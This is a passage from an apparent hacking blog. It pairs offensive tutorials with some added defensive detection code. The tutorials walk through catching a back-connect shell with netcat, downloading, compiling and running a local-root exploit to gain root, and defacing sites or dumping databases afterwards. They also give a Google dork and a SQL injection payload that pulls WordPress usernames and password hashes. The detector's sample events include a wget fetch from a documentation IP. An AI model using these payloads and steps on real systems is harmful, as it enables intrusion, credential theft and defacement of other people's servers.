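    for c in suspicious_back_connects(SAMPLE_SS):
        print(f"pid {c.pid} ({c.proc}) connected out to {c.raddr}:{c.rport} "
              f"from local port {c.lport}")
```

<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
On a live host pipe the real listing in, for example "ss -tnp | python3 script.py" with the main block reading sys.stdin; the constructed sample flags only the perl connection, while the apache2, sshd and php-fpm rows are normal traffic for a web server.</div>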
<br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">Enter your public IP address in SERVER, the port you want to connect on, leave it on Perl this time, and finally connect.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">Now you must receive the back connect with a tool named netcat; you can download it from the</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">net. After that, open your terminal if you are on Linux or CMD if you are on Windows.
I will explain only Linux; for Windows it is all the same.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><b style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">After that, follow the steps</b><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">:</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">1- Type</span><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;"> nc -vlp 433</i><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwuuKD9-PoKbPSKOTNAs3oS-vxcX1wLQZBbRmOBFloybUGZmkZBbp2wff7k7EISfM3fHGKhTMqST9MNHS3HqTIaLXSKCnwwnCwAm1lRDAGIT9fBD7bXh1Z4neguPsBoCaTbl5WnzeIMQkg/s1600/netcat.png" imageanchor="1" style="background-color: white; border: 0px; clear: left; color: #102c4a; float: left; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px 1em 1em 0px; outline: none; padding: 0px; text-decoration: none;"><img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwuuKD9-PoKbPSKOTNAs3oS-vxcX1wLQZBbRmOBFloybUGZmkZBbp2wff7k7EISfM3fHGKhTMqST9MNHS3HqTIaLXSKCnwwnCwAm1lRDAGIT9fBD7bXh1Z4neguPsBoCaTbl5WnzeIMQkg/s320/netcat.png" style="-webkit-box-shadow: rgb(16, 44, 74) 0px 0px 5px; border: 0px; box-shadow: rgb(16, 44, 74) 0px 0px 5px; margin: 0px; outline: none; padding: 5px;" width="320" /></a><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, 
sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">2- Wget [the link of the local-Root.zip]</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">3 - unzip </span><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">local-Root.zip</i><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">4 - chmod </span><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">777 local.c</i><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" 
/><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">5 - now to change the local-root from </span><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">local.c > local</i><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">gcc local.c -o local </i><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">Then you will find local.c transformed to local</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">6 - chmod 777 local</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">7 - ./local to local root work</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; 
font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">8 – su</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">then see your id </span><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">uid=0(root) gid=0(root) groups=0(root)</i><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;"><br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></i><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">Getting UID=0 means, u had got root priviledges and hence can do variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br />
<div style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px; text-align: center;">
<br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></div>
<div style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px; text-align: center;">
<b style="border: 0px; margin: 0px; outline: none; padding: 0px;">AFTER THE ROOT </b></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzU10pM2Qxp3E36lOYfpMZbEz2d_EF-9sgIH8xM6POg422UHhOtcPg9cI5z5RDbTjkhJUPXeEr5Cs7fnm5TmU4Sh9zhhPEZQan9cmRRhJe_wct_IDbSGuzK8gZZjICXfcemTFjN9I-233P/s1600/after+root.PNG" imageanchor="1" style="border: 0px; color: #102c4a; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzU10pM2Qxp3E36lOYfpMZbEz2d_EF-9sgIH8xM6POg422UHhOtcPg9cI5z5RDbTjkhJUPXeEr5Cs7fnm5TmU4Sh9zhhPEZQan9cmRRhJe_wct_IDbSGuzK8gZZjICXfcemTFjN9I-233P/s400/after+root.PNG" style="-webkit-box-shadow: rgb(16, 44, 74) 0px 0px 5px; border: 0px; box-shadow: rgb(16, 44, 74) 0px 0px 5px; margin: 0px; outline: none; padding: 5px;" width="400" /></a></div>
<br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><i style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;"><br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></i><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /></div>
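From the defender's side, the steps above leave a very recognisable trail in process telemetry: a web-server account spawning an interpreter one-liner, fetching an archive, running chmod 777, invoking gcc, and then executing the freshly built binary from a scratch directory. The following is an added example, not code from the original post, that correlates such execution events per user and raises an alert at each stage; the event records, the service-account list, the scratch-directory list and the documentation IP address are constructed assumptions.

```python
"""Detect the web-shell -> download -> compile -> run chain in process events.

Added example (not from the original post). Each event is a dict
{"user", "cwd", "cmd"} in time order, as an auditd execve or EDR feed would
deliver them. Accounts, directories and sample events are constructed.
"""
import os
import shlex
from dataclasses import dataclass

# Accounts a web server runs as; none of them has any business building binaries.
SERVICE_USERS = {"www-data", "apache", "nginx", "nobody"}
# World-writable scratch locations a compromised web process can drop files in.
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


@dataclass
class Alert:
    severity: str  # "low", "medium" or "high"
    user: str
    detail: str


def _resolve(cwd, arg):
    """Absolute path for a file given as ./name, name or /abs/name relative to cwd."""
    return os.path.normpath(arg if arg.startswith("/") else os.path.join(cwd, arg))


def analyze_events(events):
    """Return alerts for the chain: fetch -> chmod 777 -> gcc -> execute output."""
    alerts = []
    compiled = {}  # (user, output path) -> gcc command that produced it
    for ev in events:
        user = ev["user"]
        if user not in SERVICE_USERS:
            continue  # interactive and admin users are outside this rule's scope
        try:
            argv = shlex.split(ev["cmd"])
        except ValueError:
            continue
        if not argv:
            continue
        prog = os.path.basename(argv[0])
        cmd = ev["cmd"]

        if prog in ("wget", "curl") and any(a.endswith((".zip", ".c", ".tar.gz")) for a in argv[1:]):
            alerts.append(Alert("low", user, f"service account fetched source/archive: {cmd}"))
        elif prog == "chmod" and "777" in argv[1:]:
            alerts.append(Alert("medium", user, f"chmod 777 by service account: {cmd}"))
        elif prog in ("gcc", "cc", "clang"):
            out = argv[argv.index("-o") + 1] if "-o" in argv and argv.index("-o") + 1 < len(argv) else "a.out"
            out_path = _resolve(ev["cwd"], out)
            compiled[(user, out_path)] = cmd
            alerts.append(Alert("medium", user, f"compiler run by service account, output {out_path}"))
        elif prog in ("perl", "python", "sh", "bash") and any(a in ("-e", "-c", "-i") for a in argv[1:]):
            alerts.append(Alert("medium", user, f"interpreter one-liner (back-connect pattern): {cmd}"))
        elif "/" in argv[0]:  # executed by path rather than via PATH lookup
            exe = _resolve(ev["cwd"], argv[0])
            if (user, exe) in compiled:
                alerts.append(Alert("high", user, f"ran freshly compiled {exe}; local-root attempt likely"))
            elif exe.startswith(SCRATCH_DIRS):
                alerts.append(Alert("medium", user, f"executed binary from scratch directory: {exe}"))
    return alerts


def severity_counts(alerts):
    """Summarise a list of alerts as counts per severity."""
    counts = {"low": 0, "medium": 0, "high": 0}
    for a in alerts:
        counts[a.severity] += 1
    return counts


# Constructed sample feed mirroring the tutorial's steps (198.51.100.7 is a documentation address).
SAMPLE_EVENTS = [
    {"user": "www-data", "cwd": "/var/www/html", "cmd": "perl -e 'BACK_CONNECT_ONE_LINER_OMITTED'"},
    {"user": "www-data", "cwd": "/tmp", "cmd": "wget http://198.51.100.7/local-Root.zip"},
    {"user": "www-data", "cwd": "/tmp", "cmd": "unzip local-Root.zip"},
    {"user": "www-data", "cwd": "/tmp", "cmd": "chmod 777 local.c"},
    {"user": "www-data", "cwd": "/tmp", "cmd": "gcc local.c -o local"},
    {"user": "www-data", "cwd": "/tmp", "cmd": "chmod 777 local"},
    {"user": "www-data", "cwd": "/tmp", "cmd": "./local"},
    {"user": "root", "cwd": "/root", "cmd": "id"},
    {"user": "www-data", "cwd": "/var/www/html", "cmd": "ls -la"},
]

if __name__ == "__main__":
    for a in analyze_events(SAMPLE_EVENTS):
        print(f"[{a.severity:6}] {a.user}: {a.detail}")
```

The high-severity alert only fires when the executed path matches the output of an earlier gcc run by the same account, which keeps false positives low on hosts where a build user legitimately compiles; the individual stages still surface as lower-severity signals so that an analyst can see the whole chain.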
<div><b>How To Use Armitage In Backtrack 5 - Tutorial</b> (posted by Fahim, 2013-09-04)</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: white; color: #444444; font-family: inherit; font-size: 13px; line-height: 21.109375px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMfYsjtiNzRtaF2YHVcwq04A7o64xMLoQHXFLrdlmnPdB59P4hOypeFiVwu_Q_SPNtXYAqsF8I6IULObTRefmWoh2NHmXtT7N5pcWw4Blha1syJlAIDvP8xhsHaYp84fLHyaqCphNiXc8/s1600/armitage+bt5.jpg" imageanchor="1" style="clear: left; color: #3273d3; float: left; margin-bottom: 1em; margin-right: 1em; outline: none; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMfYsjtiNzRtaF2YHVcwq04A7o64xMLoQHXFLrdlmnPdB59P4hOypeFiVwu_Q_SPNtXYAqsF8I6IULObTRefmWoh2NHmXtT7N5pcWw4Blha1syJlAIDvP8xhsHaYp84fLHyaqCphNiXc8/s200/armitage+bt5.jpg" style="border-width: 0px; margin: 0px 4px 4px 0px;" /></a><b>Armitage needs no introduction: if you are involved in the world of penetration testing, you already have an idea of what Armitage is.</b></div>
<div style="background-color: white; color: #444444; font-family: inherit; font-size: 13px; line-height: 21.109375px;">
<b style="font-family: inherit;">Backtrack 5 is on fire now. After installing Backtrack 5, you need to set up Armitage to perform effective pen testing; if you are using some older version of Backtrack or another Linux distro like Ubuntu </b></div>
<div style="background-color: white; color: #444444; font-family: inherit; font-size: 13px; line-height: 21.109375px;">
<b style="font-family: inherit;"><br /></b></div>
<div dir="ltr" style="background-color: white; color: #444444; font-family: inherit; font-size: 13px; line-height: 21.109375px;" trbidi="on">
<div face="inherit">
<b>You don't need to install Armitage on Backtrack 5 because it is already included; just follow the steps to run Armitage on BT5.</b></div>
<div style="text-align: center;">
<b><span style="color: red;">Requirement</span></b></div>
<ul face="inherit" style="list-style-image: initial; list-style-position: initial; margin: 10px 0px 10px 20px;">
<li><b>Backtrack 5 </b></li>
<li><b>Java</b></li>
<li><b>Metasploit</b></li>
<li><b>MySQL</b></li>
</ul>
<div>
<b>All the requirements are available on Backtrack 5, so you need not worry about them.</b></div>
<div>
<br /></div>
<ul style="list-style-image: initial; list-style-position: initial; margin: 10px 0px 10px 20px;">
<li><b>Open your Backtrack and click on Application --> Backtrack --> Exploitation tools --> Network exploitation tools --> Metasploit framework --> Armitage</b></li>
</ul>
<br /><br /><div face="inherit">
<div face="inherit">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4uxRFFowiUpQCsEIr4w7UZ39z0ZjVQatr4c9DOtng72tFzWYLhh6lsNHXQLZz2Du-2OE9EBHlCxL9GJVWdF9GIa5LrqPhd8Sz1X2F0pY_-2JNEoOuMl4e8dkgOiVtOoe98zXYrAEqB20/s1600/bt5-armitage1.jpg" style="color: #3273d3; outline: none; text-decoration: none;"><img alt="" border="0" height="236" id="BLOGGER_PHOTO_ID_5621003597014066754" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4uxRFFowiUpQCsEIr4w7UZ39z0ZjVQatr4c9DOtng72tFzWYLhh6lsNHXQLZz2Du-2OE9EBHlCxL9GJVWdF9GIa5LrqPhd8Sz1X2F0pY_-2JNEoOuMl4e8dkgOiVtOoe98zXYrAEqB20/s400/bt5-armitage1.jpg" style="border: none; display: block; height: 236px; margin: 0px auto 10px; position: relative; text-align: center; width: 400px;" width="400" /></a><br /><div face="inherit">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl5AoN_EpMZBKKQFz3l-qnGmDaKOnZxfITtKkHq5D1T0a40VDoKf-9DoHZ5rzKpXzjQnwZlf8iP3AKJ9sAPVyVwWr2VXheT_mGMenRqZSUupIdS5V87qBlFPOpxALJiptm9ltuAPWTF7s/s1600/bt5-armitage2.jpg" style="color: #3273d3; outline: none; text-decoration: none;"><img alt="" border="0" height="196" id="BLOGGER_PHOTO_ID_5621003929913420370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl5AoN_EpMZBKKQFz3l-qnGmDaKOnZxfITtKkHq5D1T0a40VDoKf-9DoHZ5rzKpXzjQnwZlf8iP3AKJ9sAPVyVwWr2VXheT_mGMenRqZSUupIdS5V87qBlFPOpxALJiptm9ltuAPWTF7s/s400/bt5-armitage2.jpg" style="border: none; display: block; height: 210px; margin: 0px auto 10px; position: relative; text-align: center; width: 428px;" width="400" /></a></div>
</div>
</div>
<ul style="list-style-image: initial; list-style-position: initial; margin: 10px 0px 10px 20px;">
<li><b>On the next window click on Connect to start Armitage; if it is your first time, it may take some time to start.</b></li>
</ul>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYwTXRt3rFxQNlHB8w0appLXyERDx6_YIWme2kudmd87N7H40muSFQW9jFuaRECEgkxuDbiJL7JbyATJEDJi4N_kwx16JiljJXEe1CpTlAZPXAVQeiIomse9l0qf69aOvt_HNOK_zWZ5GS/s1600/bt5-armitage4.jpg" imageanchor="1" style="color: #3273d3; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYwTXRt3rFxQNlHB8w0appLXyERDx6_YIWme2kudmd87N7H40muSFQW9jFuaRECEgkxuDbiJL7JbyATJEDJi4N_kwx16JiljJXEe1CpTlAZPXAVQeiIomse9l0qf69aOvt_HNOK_zWZ5GS/s320/bt5-armitage4.jpg" style="border-width: 0px; margin: 0px 4px 4px 0px;" width="320" /></a></div>
</div>
<ul style="list-style-image: initial; list-style-position: initial; margin: 10px 0px 10px 20px;">
<li><b>Now you will see the Armitage window, and Armitage is ready to use. If you don't know how to use it, you will have to wait for our next article, in which we will teach you how to use Armitage in different ways.</b></li>
</ul>
<div>
<br /><br /><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_F7tyLBlbYpz4xNkQJFfMJCRjc7ozmNdYSmNeZafPII8oqUsTejdIHVyn62kViXRIUVP5T1LipGN1xGULnqy5EbnYLsDNzrLwPdCUasSSe-aqNxncOJ4c-8ZvcOgPGJYvDQPZ-qnomcE/s1600/bt5-armitage5.jpg" style="color: #3273d3; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none;"><img alt="" border="0" height="183" id="BLOGGER_PHOTO_ID_5621004530706965138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_F7tyLBlbYpz4xNkQJFfMJCRjc7ozmNdYSmNeZafPII8oqUsTejdIHVyn62kViXRIUVP5T1LipGN1xGULnqy5EbnYLsDNzrLwPdCUasSSe-aqNxncOJ4c-8ZvcOgPGJYvDQPZ-qnomcE/s400/bt5-armitage5.jpg" style="border: none; display: block; height: 236px; margin: 0px auto 10px; position: relative; width: 400px;" width="400" /></a></div>
</div>
</div>
</div>
<div><b>How to hack WordPress?</b> (posted by Fahim, 2013-09-02)</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;">This tutorial will give you an idea about hacking WordPress. WordPress can be hacked with this simple trick. This trick does not apply to all WP sites, but the attack is almost 70% successful. So let's begin the tutorial. </span><br />
<br style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;" /><span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;">1. Open Google and search for this dork:</span><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><br />
<div style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px; margin: 0px; padding: 0px 0px 0px 30px;">
<div style="margin: 0px; padding: 0px 0px 0px 30px;">
<br /><div class="bbCodeBlock bbCodeQuote" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0392157) 0px 1px 6px; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 1px solid rgb(222, 222, 222); box-shadow: rgba(0, 0, 0, 0.0392157) 0px 1px 6px; margin: 1em 150px 1em 0px; padding: 0px;">
<aside><blockquote class="quoteContainer" style="background-color: whitesmoke; background-position: 50% 0%; background-repeat: repeat no-repeat; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; font-size: 9pt; margin: 0px; overflow: hidden; padding: 10px; position: relative;">
<div class="quote" style="margin: 0px; max-height: 150px; overflow: hidden; padding: 0px 0px 0px 3px;">
<span style="color: lime;"><span style="color: black;">inurl:"fbconnect_action=myhome"</span></span></div>
</blockquote>
</aside></div>
</div>
</div>
<br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" />
<br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;"><span style="color: black;">2. Now open any link from the search results.<br /><br />3. After opening the link, change this part of the URL</span></span><br style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px;" /><br />
<div style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px; margin: 0px; padding: 0px 0px 0px 30px;">
<br /><div class="bbCodeBlock bbCodeQuote" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0392157) 0px 1px 6px; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 1px solid rgb(222, 222, 222); box-shadow: rgba(0, 0, 0, 0.0392157) 0px 1px 6px; margin: 1em 150px 1em 0px; padding: 0px;">
<aside><blockquote class="quoteContainer" style="background-color: whitesmoke; background-position: 50% 0%; background-repeat: repeat no-repeat; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; font-size: 9pt; margin: 0px; overflow: hidden; padding: 10px; position: relative;">
<div class="quote" style="margin: 0px; max-height: 150px; overflow: hidden; padding: 0px 0px 0px 3px;">
?fbconnect_action=myhome&userid=</div>
</blockquote>
</aside></div>
</div>
<span style="background-color: #fcfcfc; color: #141414; font-size: 14px; line-height: 28px;"><span style="color: black;">with this </span></span><br />
<div style="background-color: #fcfcfc; color: #141414; font-family: HelveticaNeue-Light, 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 28px; margin: 0px; padding: 0px 0px 0px 30px;">
<div class="bbCodeBlock bbCodeQuote" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0392157) 0px 1px 6px; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 1px solid rgb(222, 222, 222); box-shadow: rgba(0, 0, 0, 0.0392157) 0px 1px 6px; margin: 1em 150px 1em 0px; padding: 0px;">
<aside><blockquote class="quoteContainer" style="background-color: whitesmoke; background-position: 50% 0%; background-repeat: repeat no-repeat; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; font-size: 9pt; margin: 0px; overflow: hidden; padding: 10px; position: relative;">
<div class="quote" style="margin: 0px; max-height: 150px; overflow: hidden; padding: 0px 0px 0px 3px;">
<span style="font-family: 'Times New Roman';"><span style="color: lime;"><span style="color: black;">?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_login,0x3a,user_pass) z0mbyak,7,8,9,10,11,12+from+wp_users--</span></span></span></div>
</blockquote>
</aside></div>
</div>
